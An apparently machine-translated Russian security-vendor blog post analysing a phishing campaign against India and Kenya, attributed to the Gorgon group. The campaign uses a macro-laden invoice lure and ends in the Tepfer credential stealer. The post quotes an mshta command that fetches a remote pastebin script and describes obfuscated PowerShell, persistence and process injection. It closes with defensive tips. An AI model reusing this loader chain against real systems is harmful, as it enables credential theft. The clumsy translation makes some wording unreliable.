Блог 360 Total Security

Фишинговая деятельность в Кении и Индии, организованная организацией «Подозреваемый Горгон»

Недавно  360 Total Security перехватил ряд фишинговых атак, в основном направленных на Индию и Кению.  В техническом анализе выяснились, что различные технологии, использовавшиеся на ранней стадии фишинг-атаки, использовались хакерскими бандами Горгоны, раскрытыми друзьями. Эти технологии очень похожи, разница только в том, что конечная полезная нагрузка в данном атакте — не RevengeRat,  а хакерский взломщик Tepfer.

Помимо кражи конфиденциальной информации, хранящейся на более чем 90 часто используемых программах (включая FTP, почту, браузер и т. Д.) на компьютере пользователя, троянец Tepfer дополнительно загружает полезную нагрузку атаки для выполнения.

Технический анализ

Перехваченный документ-приманка с именем OVERDUE INVOICE.xls представляет собой напоминание, подделанное злоумышленником как просроченная учетная запись. Он доставляется фишинговыми электронными письмами и социальным программным обеспечением, и целевого пользователя обманывают для открытия, чтобы активировать макровирус, содержащийся в документе с наживкой.

После активации макровируса будет выполнен файл mshta.exe http [:] //http://www.bitly.com/aswoeosXxxwxty.

После 301 перехода mshta.exe в конечном итоге выполнит сценарий JavaScript по адресу http [:] // www.pastebin.com/raw/JBXuYSGw:

После декодирования сценария с помощью многоуровневого URL-адреса, как показано на следующем рисунке, три основные логики (1) вызывать PowerShell для отправки программного обеспечения для кражи. (2) Создать запланированное задание для реализации резидентства вирусов. (3) Создать реестр Выполнить элемент, чтобы добиться самостоятельного запуска.

Чтобы избежать обнаружения программного обеспечения безопасности, сценарий powershell  запутан, как покажено ниже:

9xhzpJC4 расшифрует динамическую библиотеку C # sc64.dll:

Злоумышленник запутал sc64.dll. По анализу динамическая библиотека является инжектором. Его основная функция — вызывать функцию exe в классе Kackitup для внедрения исполняемого файла в процесс:

dX1tzMgD является PE-файлом с шестнадцатеричной путаницей. После  обфускации он  стал троянцем хакеров Tepfer:

После того, как Powershell расшифровывает вышеупомянутую динамическую библиотеку и хакерский хакер Tepfer, он вызывает динамическую библиотеку K.Kackitup.exe (), чтобы внедрить хакерский хакер в процесс calc.exe.

Трояны Tepfer украдут пароли учетных записей, хранящиеся в более чем 90 часто используемых программах, как показано на следующем рисунке:

Загрузить и выполнить следующий этап атаки полезной нагрузки:

Совет по безопасности:

(1) Не открывайте электронные письма неизвестного происхождения. Вы должны отправить такие письма в отдел безопасности для расследования, чтобы подтвердить безопасность перед открытием.

(2) Не нажимайте кнопку «Включить макрос» неизвестных файлов безопасности, чтобы предотвратить проникновение макровируса.

(3) Своевременно обновить системных исправлений для устранения уязвимостей системы.

(4) 360 Total Security может своевременно обнаруживать и перехватывать такие атаки. Мы рекомендуем, чтобы пользователи зашли на сайт www.360totalsecurity.com для установки и выпонения полной проверки.